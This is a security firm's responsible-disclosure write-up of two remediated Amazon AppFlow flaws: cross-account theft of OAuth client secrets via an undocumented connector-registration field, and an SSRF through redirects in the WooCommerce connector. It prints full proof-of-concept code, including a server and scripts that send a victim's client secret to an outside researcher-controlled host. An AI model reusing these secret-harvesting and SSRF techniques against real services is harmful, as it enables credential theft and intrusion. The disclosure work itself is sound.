get in touch

News

Amazon AppFlow vulnerabilities: Undocumented API allowed reading partial secrets, SSRF in WooCommerce connector

Back to News
OSRU @ Ronin //

Amazon AppFlow is a fully managed integration service for transferring data between software-as-a-service (SaaS) applications (for example, Salesforce, Zendesk, Slack, and ServiceNow) and AWS services.

The security research team at Ronin discovered two vulnerabilities in AppFlow and responsibly disclosed them to the AWS Security team, who have since remediated them.

Amazon AppFlow team has confirmed that both issues were not exploited by auditing the service logs

Undocumented API allowed reading partial secrets

The AWS service teams publish API models that are used by AWS SDKs for consuming those services. These models contain service endpoint details, signing information, exposed operations, input/output structures, and required fields. These API models are meant to be public and may contain information about services that are internal-only, in development or test phases.

The AWS console is no exception, it is just a client that makes use of the AWS JS SDK and has to know these API models to consume the exposed services.

When looking at the API console for the AppFlow API model, we stumbled upon a definition of the AppFlow service called sandstoneconfigurationservicelambda.

Within the metadata, we saw that the serviceId was Appflow and it required appflow signatures. The API version was 2017-07-25 which led us to assume that this was an old service spec and that maybe Sandstone was just an internal codename for AppFlow during its development.

{
  "version": "2.0",
  "metadata": {
    "apiVersion": "2017-07-25",
    "endpointPrefix": "sandstoneconfigurationservicelambda",
    "jsonVersion": "1.1",
    "protocol": "rest-json",
    "serviceAbbreviation": "Appflow",
    "serviceFullName": "Amazon Appflow",
    "serviceId": "Appflow",
    "signatureVersion": "v4",
    "signingName": "appflow",
    "uid": "sandstoneconfigurationservicelambda-2017-07-25"
  }
}

We then looked at the operations and they looked similar to the newer AppFlow spec, but with a few differences in input fields. Some fields in /register-connector and /update-connector-registration stood out as they weren’t present in the newer spec.

We had seen a similar field prefix awsOwnedManagedApp in the /describe-connector output, it was awsOwnedManagedAppClientId, for one of the first-party connectors.

Naturally, we tried to supply a Secret ARN to this field in the /register-connector call, and after a few attempts we noticed that it only worked for secrets managed by AppFlow that contain clientId and clientSecret. In CloudTrail, we noticed that the calling principal for GetSecretValue was appflow.amazonaws.com.

All secrets created by AppFlow have a policy that allows the AppFlow service to manage them:

{
  "Effect": "Allow",
  "Principal": {
    "Service": "appflow.amazonaws.com"
  },
  "Action": [
    "secretsmanager:GetSecretValue",
    "secretsmanager:PutSecretValue",
    "secretsmanager:DeleteSecret",
    "secretsmanager:DescribeSecret",
    "secretsmanager:UpdateSecret"
  ],
  "Resource": "*"
}

We proceeded to create a connection profile for a random AppFlow connector in another AWS account and used its secret ARN in our connector registration call, and it worked! The regististration call succeeded and we were able to see the clientId value in the secret stored in our other account in the describe-connector call.

TLDR

Summary

This vulnerability allowed anyone to steal secrets managed by AppFlow in any AWS account.

It is made possible by using an undocumented field awsOwnedManagedAppCredentialsArn during connector registration and connector updates. We believe it was made for managed OAuth apps (we only found the SharePoint connector making use of it).

Preconditions

  • We needed to know the Secret ARN of the victim’s secret. (see note below)
  • The victim secret ARN belonged to a connection profile which is of the type OAuth or contains clientId and clientSecret.

Steps

  1. We created a lambda function that mimiced an OAuth2 capable connector to pass the registration tests. The token URL pointed to something we controlled, this was needed later to store the secrets passed on by AppFlow for token exchange.
  2. Registered the connector normally but supplied awsOwnedManagedAppCredentialsArn with the victim’s secret ARN.
  3. After the connector was registered, we were able to see the clientId in the describe-connector response at path $.connectorConfiguration.authenticationConfig.oAuth2Defaults.awsOwnedManagedAppClientId.
  4. Getting the clientSecret was a bit tricky and we had to attempt creating a connector connection. We pointed the tokenUrl (mentioned in #1) to something we controlled and recorded whatever was sent during the exchange process.

NOTE: The good news is that all secret ARNs in AWS Secrets Manager contain not only the unique human-provided secret name (which could be brute-forced with a common word dictionary) but also six random characters (these appear to be upper and lower case ASCII, meaning 52^6 of randomness, or close to 20 billion possibilities), making brute-force exploitation of this vulnerability impractical. To be practical, the attacker would have needed to know not only the account number but also the full ARN including the six random characters of the secret before exploiting the flaw.

Testing

We created a detailed proof-of-concept with all the elements required to make it work.

Server

A basic web application was created to harvest the clientSecret values that were passed on by AppFlow to the OAuth server’s /token endpoint.

const express = require('express')
const { LRUCache } = require('lru-cache')
const app = express()
const port = 8082

const records = new LRUCache({max: 50})

app.use(express.json())
app.use(express.urlencoded({ extended: true }));

app.post('/record/:id', (req, res) => {
  const id = req.params.id
  records.set(id, {
    headers: req.headers,
    query: req.query,
    body: req.body,
  })
  res.json({
    'ok': 'ok'
  })
})

app.get('/record/:id', (req, res) => {
  const id = req.params.id
  if (records.has(id)) {
    res.json(records.get(id))
  } else {
    res.json({
      'error': 'not found'
    })
  }
})

app.get('*', (req, res) => {
  res.json({
    'health': 'UP'
  })
})

app.listen(port, () => {
  console.log(`App listening on port ${port}`)
})

Custom Connector

For this vulnerability to work, we do need a valid OAuth capable connector, a simple connector was created using the following code with just enough functionality to pass the registration tests.

The ARN for this lambda function will be used later in the harvesting steps.

export const handler = async(event) => {
    if (event.type === 'DescribeConnectorConfigurationRequest') {
        return {
          "connectorOwner": "SampleConnector",
          "connectorName": "SampleRoninDebugConnector",
          "connectorVersion": "1.0",
          "connectorModes": [
            "SOURCE"
          ],
          "authenticationConfig": {
            "oAuth2Defaults": {
              "oAuthScopes": [
                "openid"
              ],
              "tokenURL": [
                "https://xxx.ronin.engineering/"
              ],
              "authURL": [
                "https://xxx.ronin.engineering/"
              ],
              "oAuth2GrantTypesSupported": [
                "AUTHORIZATION_CODE"
              ],
              "oAuth2ContentType": "URL_ENCODED",
              "oAuth2MethodType": "HTTP_POST"
            },
            "isOAuth2Supported": true
          },
          "connectorRuntimeSetting": [
          ],
          "supportedApiVersions": [
            "v1.0"
          ],
          "operatorsSupported": [
            "PROJECTION",
            "LESS_THAN",
            "GREATER_THAN",
            "BETWEEN",
            "LESS_THAN_OR_EQUAL_TO",
            "GREATER_THAN_OR_EQUAL_TO",
            "EQUAL_TO",
            "CONTAINS",
            "NOT_EQUAL_TO",
            "ADDITION",
            "SUBTRACTION",
            "MULTIPLICATION",
            "DIVISION",
            "MASK_ALL",
            "MASK_FIRST_N",
            "MASK_LAST_N",
            "VALIDATE_NON_NULL",
            "VALIDATE_NON_ZERO",
            "VALIDATE_NON_NEGATIVE",
            "VALIDATE_NUMERIC",
            "NO_OP"
          ],
          "supportedTriggerTypes": [
            "SCHEDULED",
            "ONDEMAND"
          ],
          "triggerFrequenciesSupported": [
            "BYMINUTE",
            "HOURLY",
            "DAILY",
            "WEEKLY",
            "MONTHLY",
            "ONCE"
          ],
          "supportedWriteOperations": [
            
          ],
          "isSuccess": true
        }
    }
    
    return {
        statusCode: 200,
        body: JSON.stringify('Unknown type'),
    };
};

Setting up a victim

For setting up a victim account, we either needed to create a connection profile for a real OAuth supported connector or we could just add the clientId and clientSecret values to the managed secret for any profile. The following script for the POC does the latter because it’s simpler.

import boto3
import json

af = boto3.client('appflow')
sm = boto3.client('secretsmanager')

def get_secret_arn(name):
    response = af.describe_connector_profiles(
        connectorProfileNames=[
            name,
        ],
    )
    return response['connectorProfileDetails'][0]['credentialsArn']

def append_secrets(arn, new_secrets = {}):
    response = sm.get_secret_value(
        SecretId=arn,
    )

    val = json.loads(response['SecretString'])

    val.update(new_secrets)

    sm.put_secret_value(
        SecretId=arn,
        SecretString=json.dumps(val),
    )

    return val

def create_example_connection(name):
    print("Creating connection profile:", name)
    try:
        af.create_connector_profile(
            connectorProfileName=name,
            connectionMode='Public',
            connectorType='CustomConnector',
            connectorLabel='WooCommerce',
            connectorProfileConfig={
                "connectorProfileProperties": {
                    "CustomConnector": {
                            "profileProperties": {
                            "instanceUrl": "https://checkip.amazonaws.com/"
                        }
                    }
                },
                "connectorProfileCredentials": {
                    "CustomConnector": {
                        "authenticationType": "CUSTOM",
                        "custom": {
                            "customAuthenticationType": "api_key",
                            "credentialsMap": {
                                "consumerKey": "no-val",
                                "consumerSecret": "no-val",
                            }
                        }
                    }
                }
            }
        )
    except af.exceptions.ConflictException:
        pass

name = 'example-victim-connector'

create_example_connection(name)
arn = get_secret_arn(name)

print("Credential ARN: %s, adding clientId and clientSecret for the POC" % (arn))

val = append_secrets(arn, {
    'clientId': 'MyNotSoSecretClientId',
    'clientSecret': 'MySuperSecretValue123',
})

print(json.dumps(val, indent=2))

with open("appflow_secret.arn", "w") as f:
    f.write(arn)

print("Wrote the secret ARN to the file, proceed with the next script")

Harvest Secrets

  1. We registered (or updated) our connector with the victim’s Secret ARN and our Lambda function ARN.
  2. Retrieved the clientId from the describe-connector call.
  3. Attempted to create a connection profile using a dummy authCode and a tokenUrl pointing to our server.
  4. Retrieved what was sent to the tokenUrl endpoint. It contained the clientId and clientSecret.
import boto3
import json
import io
import requests
from aws_requests_auth.boto_utils import BotoAWSRequestsAuth
import time
import uuid

af = boto3.client('appflow')
iam = boto3.client('iam')
function_arn = "<ARN of our deployed lambda>"

session_region = boto3.session.Session().region_name

auth = BotoAWSRequestsAuth(
    aws_host="appflow.%s.amazonaws.com" % (session_region),
    aws_region=session_region,
    aws_service="appflow"
)

# non standard API call, uses undocumented field
def register_connector(region, name, lambda_arn, victim_secret_arn):
    response = requests.post(
        "https://appflow.%s.amazonaws.com/register-connector" % (region),
        json={
            "connectorLabel": name,
            "connectorProvisioningType": "LAMBDA",
            "description": "My AWS POC",
            "connectorProvisioningConfig": {
                "lambda": {
                    "lambdaArn": lambda_arn,
                }
            },
            "awsOwnedManagedAppCredentialsArn": victim_secret_arn,
            "RegisteredBy": "CUSTOM",
        },
        auth=auth
    )

    # if it already exists, update it with the new secret
    if "already exists" in response.text:
        response = requests.post(
            "https://appflow.%s.amazonaws.com/update-connector-registration" % (region),
            json={
                "connectorLabel": name,
                "description": "My AWS POC",
                "connectorProvisioningConfig": {
                    "lambda": {
                        "lambdaArn": lambda_arn,
                    }
                },
                "awsOwnedManagedAppCredentialsArn": victim_secret_arn,
                "RegisteredBy": "CUSTOM",
            },
            auth=auth
        )

    print(response.json())

def get_connector(region, name):
    response = requests.post(
        "https://appflow.%s.amazonaws.com/describe-connector" % (region),
        json={
            "connectorType": "CustomConnector",
            "connectorLabel": name,
        },
        auth=auth
    )

    return response.json()['connectorConfiguration']

def create_connection(region, name, connector_label, record_id):
    response = requests.post(
        "https://appflow.%s.amazonaws.com/create-connector-profile" % (region),
        json={
            "connectorProfileName": name,
            "connectionMode": "Public",
            "connectorType": "CustomConnector",
            "connectorLabel": connector_label,
            "connectorProfileConfig": {
                "connectorProfileProperties": {
                    "CustomConnector": {
                        "profileProperties": {},
                        "oAuth2Properties": {
                            "tokenUrl": "https://xxx.ronin.engineering/record/%s" % (record_id),
                            "oAuth2GrantType": "AUTHORIZATION_CODE",
                            "tokenUrlCustomProperties": {}
                        }
                    }
                },
                "connectorProfileCredentials": {
                    "CustomConnector": {
                        "oauth2": {
                            "oAuthRequest": {
                                "authCode": "dummy-code",
                                "redirectUri": "https://%s.console.aws.amazon.com/appflow/oauth" % (region)
                            }
                        },
                        "authenticationType": "OAUTH2"
                    }
                }
            }
            },
        auth=auth
    )
    # we expect an error - Authentication exception from connector: Error while deserializing auth response
    print(response.text)

victim_secret_arn = open('appflow_secret.arn', 'r').read()

connector_label = 'MyConnectorPOC'

register_connector(session_region, connector_label, function_arn, victim_secret_arn)

connector = get_connector(session_region, connector_label)

client_id = connector['authenticationConfig']['oAuth2Defaults']['awsOwnedManagedAppClientId']

# client ID can be retrieved from the describe-connector
print()
print("Client ID:",client_id)
print()

# client secret is tricky, it's only sent to the token endpoint
random_id = str(uuid.uuid4())

# we expect it to fail as the response from our server won't be deserialized correctly
# we just use it to record the secret sent
create_connection(session_region, 'appflow-connection-poc', connector_label, random_id)
print()

res = requests.get("https://xxx.ronin.engineering/record/%s" % (random_id))

print(json.dumps(res.json(), indent=2))

The request we received from AppFlow for token exchange:

{
  "headers": {
    "x-forwarded-for": "3.248.186.93",
    "host": "localhost:8082",
    "connection": "close",
    "content-length": "190",
    "accept": "application/json",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "user-agent": "Apache-HttpClient/UNAVAILABLE (Java/1.8.0_372)",
    "accept-encoding": "gzip,deflate"
  },
  "query": {},
  "body": {
    "client_id": "MyNotSoSecretClientId",
    "client_secret": "MySuperSecretValue123",
    "grant_type": "authorization_code",
    "redirect_uri": "https://eu-west-1.console.aws.amazon.com/appflow/oauth",
    "code": "dummy-code"
  }
}

We also noticed that it was persistent, if we updated clientId or clientSerect in the victim’s account, we received new values in our describe-connector calls and the harvesting steps. These values were never cached and were retrieved fresh using GetSecretValue by AppFlow.

SSRF using redirects

Server-side request forgery (SSRF) is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location.

AppFlow is all about data integrations with AWS and external services, it provides first-party connectors for popular services. This means that the customer gets to define where their application is, what its credentials are, etc., for the integration to work.

We chose the WooCommerce connector for our test because it allowed us to enter a full URL to the instance. Other connectors at the time didn’t really let us supply full URLs or had some other requirements that we didn’t have access to. Since the WooCommerce software is packaged as a Wordpress plugin and it can be deployed anywhere, AppFlow accepted any URL as a WooCommerce instance as long as it returned a HTTP 200 OK response.

This can also be done programatically using the AWS SDK.

name = 'test-connection'
redirector_service = 'https://xxx.ronin.engineering'
client.create_connector_profile(
    connectorProfileName=name,
    connectionMode='Public',
    connectorType='CustomConnector',
    connectorLabel='WooCommerce',
    connectorProfileConfig={
        "connectorProfileProperties": {
            "CustomConnector": {
                    "profileProperties": {
                    "instanceUrl": redirector_service
                }
            }
        },
        "connectorProfileCredentials": {
            "CustomConnector": {
                "authenticationType": "CUSTOM",
                "custom": {
                    "customAuthenticationType": "api_key",
                    "credentialsMap": {
                        "consumerKey": "example",
                        "consumerSecret": "example"
                    }
                }
            }
        }
    }
)

We set up a flow with the new connection that we created and used the entity coupon as an example. The sink was set to an S3 bucket. We didn’t really care about the entity, we just wanted AppFlow to make a request to our instance.

connection_profile_name = 'test-connection'
client.create_flow(
    flowName=name,
    description='SSRF POC',
    triggerConfig={
        "triggerType": "OnDemand"
    },
    sourceFlowConfig={
        "connectorType": "CustomConnector",
        "connectorProfileName": connection_profile_name,
        "apiVersion": "v3",
        "sourceConnectorProperties": {
            "CustomConnector": {
                "entityName": "coupon",
                "customProperties": {

                }
            }
        }
    },
    destinationFlowConfigList=[
        {
            "connectorType": "S3",
            "destinationConnectorProperties": {
                "S3": {
                    "bucketName": sink_bucket,
                    "bucketPrefix": "",
                    "s3OutputFormatConfig": {
                        "fileType": "JSON",
                        "prefixConfig": {
                            "pathPrefixHierarchy": [
                                "EXECUTION_ID"
                            ]
                        },
                        "aggregationConfig": {
                            "aggregationType": "None"
                        }
                    }
                }
            }
        }
    ],
    tasks=[
        {
            "taskType": "Filter",
            "sourceFields": [
                "id"
            ],
            "taskProperties": {

            },
            "connectorOperator": {
                "CustomConnector": "PROJECTION"
            }
        },
        {
            "taskType": "Map",
            "sourceFields": [
                "id"
            ],
            "taskProperties": {
                "SOURCE_DATA_TYPE": "Integer",
                "DESTINATION_DATA_TYPE": "Integer"
            },
            "destinationField": "id",
            "connectorOperator": {
                "CustomConnector": "NO_OP"
            }
        }
    ],
    tags={},
    metadataCatalogConfig={}
)

Our server responded to all requests with a 200 response and a JSON body with {"health":"UP"}. After we ran the flow, we saw that the response from our server was being written in the run logs.

The request failed because the service Source WooCommerce returned the following error: Details: The response from the connector application couldn't be parsed because of the following error: %sCannot deserialize value of type `java.util.ArrayList<com.amazonaws.appflow.connector.woocommerce.model.WooCommerceStringQueryResponse>` from Object value (token `JsonToken.START_OBJECT`) at [Source: (byte[])"{"health":"UP"}"; line: 1, column: 1], ErrorCode: ServerError.

We then set a 302 redirect to https://checkip.amazonaws.com for all requests and ran the flow again. To our surprise, AppFlow followed the redirect and consumed the contents. The flow failed as expected because it couldn’t parse the response as it expected a well-formed JSON output for the coupon entity.

The error now contained the contents of https://checkip.amazonaws.com, which presumably was one of the outbound IP addresses of the WooCommerce connector.

This confirmed that we could make arbitrary GET requests to any URL from the WooCommerce connector.

The describe-connectors call shows that provisiong type for the WooCommerce connector is LAMBDA, which means that it runs as a Lambda function and we should be able to access HTTP resources in its Lambda runtime.

{
  "connectorDescription": "Appflow managed connector registration test",
  "connectorLabel": "WooCommerce",
  "connectorModes": [
    "SOURCE"
  ],
  "connectorName": "WooCommerce",
  "connectorOwner": "AWS",
  "connectorProvisioningType": "LAMBDA",
  "connectorType": "CustomConnector",
  "connectorVersion": "1.0",
  "registeredAt": 1674081093.708,
  "registeredBy": "AWS"
}

We wanted to see if the Rapid Runtime API returned information for request payloads (for other customers using the same connector) when a forged request was made to http://127.0.0.1:9001/2018-06-01/runtime/invocation/next. But it didn’t work for us and we were only able to see the payload of our current request that was being processed.

The response in the error was truncated to 500 characters. For us, this was enough to let AWS Security know of the URL validation bug and SSRF due the HTTP client following redirects.

Disclosure timeline

  • Jun 21, 2023: Ronin reports the SSRF finding to AWS
  • Jun 22, 2023: AWS requests a POC
  • Jun 22, 2023: Ronin sends a POC for the SSRF issue
  • Jun 24, 2023: Ronin reports the secrets issue to AWS with a POC
  • Jul 06, 2023: AWS asks for clarifications, Ronin provides clarifications
  • Aug 22, 2023: AWS reported that it was in the process of deploying fixes
  • Sep 18, 2023: AWS successfully deploys changes
  • Nov 06, 2023: Ronin releases public disclosure

Acknowledgements

We want to express our sincere gratitude to Alexis F., Albin V. and the rest of the AWS Security Outreach team for always being a pleasure to deal with.